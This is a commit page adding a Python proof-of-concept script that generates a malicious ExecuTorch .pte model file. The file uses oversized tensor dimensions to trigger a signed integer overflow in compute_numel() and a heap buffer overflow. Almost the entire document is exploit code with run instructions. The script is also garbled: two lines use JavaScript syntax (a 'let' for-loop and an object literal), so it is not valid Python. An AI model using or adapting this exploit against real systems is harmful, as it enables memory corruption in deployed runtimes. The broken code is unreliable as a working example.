jdhart81 commited on
Commit
b0034d7
·
verified ·
1 Parent(s): d5aabbd

Add PoC for compute_numel overflow

Browse files
Files changed (1) hide show
  1. poc_compute_numel_overflow.py +101 -0
poc_compute_numel_overflow.py ADDED
@@ -0,0 +1,101 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ #!/usr/bin/env python3
2
+ """PoC: compute_numel() signed integer overflow in Meta ExecuTorch
3
+ Generates a malicious .pte file that triggers heap buffer overflow.
4
+ Run: pip install flatbuffers && python3 poc_compute_numel_overflow.py
5
+ """
6
+ import flatbuffers
7
+
8
+ FILE_IDENTIFIER = b"ET12"
9
+
10
+ def build_malicious_pte(output_path, sizes):
11
+ builder = flatbuffers.Builder(4096)
12
+ num_dims = len(sizes)
13
+ builder.StartVector(4, num_dims, 4)
14
+ for s in reversed(sizes):
15
+ builder.PrependInt32(s)
16
+ sizes_vec = builder.EndVector()
17
+ builder.StartVector(1, num_dims, 1)
18
+ for i in reversed(range(num_dims)):
19
+ builder.PrependUint8(i)
20
+ dim_order_vec = builder.EndVector()
21
+ builder.StartObject(10)
22
+ builder.PrependInt8Slot(0, 6, 0)
23
+ builder.PrependInt32Slot(1, 0, 0)
24
+ builder.PrependUOffsetTRelativeSlot(2, sizes_vec, 0)
25
+ builder.PrependUOffsetTRelativeSlot(3, dim_order_vec, 0)
26
+ builder.PrependBoolSlot(4, False, 0)
27
+ builder.PrependUint32Slot(5, 1, 0)
28
+ builder.PrependInt8Slot(7, 0, 0)
29
+ builder.PrependInt8Slot(8, 0, 0)
30
+ tensor = builder.EndObject()
31
+ builder.StartObject(2)
32
+ builder.PrependUint8Slot(0, 5, 0)
33
+ builder.PrependUOffsetTRelativeSlot(1, tensor, 0)
34
+ evalue = builder.EndObject()
35
+ builder.StartVector(4, 1, 4)
36
+ builder.PrependUOffsetTRelative(evalue)
37
+ values_vec = builder.EndVector()
38
+ builder.StartVector(4, 1, 4)
39
+ builder.PrependInt32(0)
40
+ inputs = builder.EndVector()
41
+ builder.StartVector(4, 1, 4)
42
+ builder.PrependInt32(0)
43
+ outputs = builder.EndVector()
44
+ builder.StartVector(8, 2, 8)
45
+ builder.PrependInt64(0)
46
+ builder.PrependInt64(0)
47
+ ncsizes = builder.EndVector()
48
+ name = builder.CreateString("forward")
49
+ builder.StartObject(9)
50
+ builder.PrependUOffsetTRelativeSlot(0, name, 0)
51
+ builder.PrependUOffsetTRelativeSlot(2, values_vec, 0)
52
+ builder.PrependUOffsetTRelativeSlot(3, inputs, 0)
53
+ builder.PrependUOffsetTRelativeSlot(4, outputs, 0)
54
+ builder.PrependUOffsetTRelativeSlot(8, ncsizes, 0)
55
+ ep = builder.EndObject()
56
+ builder.StartVector(4, 1, 4)
57
+ builder.PrependUOffsetTRelative(ep)
58
+ ep_vec = builder.EndVector()
59
+ builder.StartVector(1, 0, 1)
60
+ es = builder.EndVector()
61
+ builder.StartObject(1)
62
+ builder.PrependUOffsetTRelativeSlot(0, es, 0)
63
+ b0 = builder.EndObject()
64
+ builder.StartVector(1, 16, 16)
65
+ for (let j = 0; j < 16; j++) builder.PrependUint8(0x41);
66
+ ds = builder.EndVector()
67
+ builder.StartObject(1)
68
+ builder.PrependUOffsetTRelativeSlot(0, ds, 0)
69
+ b1 = builder.EndObject()
70
+ builder.StartVector(4, 2, 4)
71
+ builder.PrependUOffsetTRelative(b1)
72
+ builder.PrependUOffsetTRelative(b0)
73
+ cb = builder.EndVector()
74
+ builder.StartObject(2)
75
+ builder.PrependUint32Slot(0, 0, 0)
76
+ cs = builder.EndObject()
77
+ builder.StartObject(8)
78
+ builder.PrependUint32Slot(0, 0, 0)
79
+ builder.PrependUOffsetTRelativeSlot(1, ep_vec, 0)
80
+ builder.PrependUOffsetTRelativeSlot(2, cb, 0)
81
+ builder.PrependUOffsetTRelativeSlot(5, cs, 0)
82
+ prog = builder.EndObject()
83
+ builder.Finish(prog, {fileIdentifier: FILE_IDENTIFIER})
84
+ buf = bytes(builder.Output())
85
+ with open(output_path, "wb") as f:
86
+ f.write(buf)
87
+ return buf
88
+
89
+ if __name__ == "__main__":
90
+ sizes = [2147483647, 2147483647, 4]
91
+ true_product = 1
92
+ for s in sizes:
93
+ true_product *= s
94
+ print(f"Tensor sizes: {sizes}")
95
+ print(f"True numel: {true_product:,}")
96
+ print(f"INT64_MAX: {(1 << 63) - 1:,}")
97
+ print(f"Overflow: {true_product > (1 << 63) - 1}")
98
+ buf = build_malicious_pte("malicious_overflow.pte", sizes)
99
+ print(f"Generated malicious_overflow.pte ({len(buf)} bytes)")
100
+ assert buf[4:8] == FILE_IDENTIFIER
101
+ print("Valid ET12 FlatBuffer confirmed")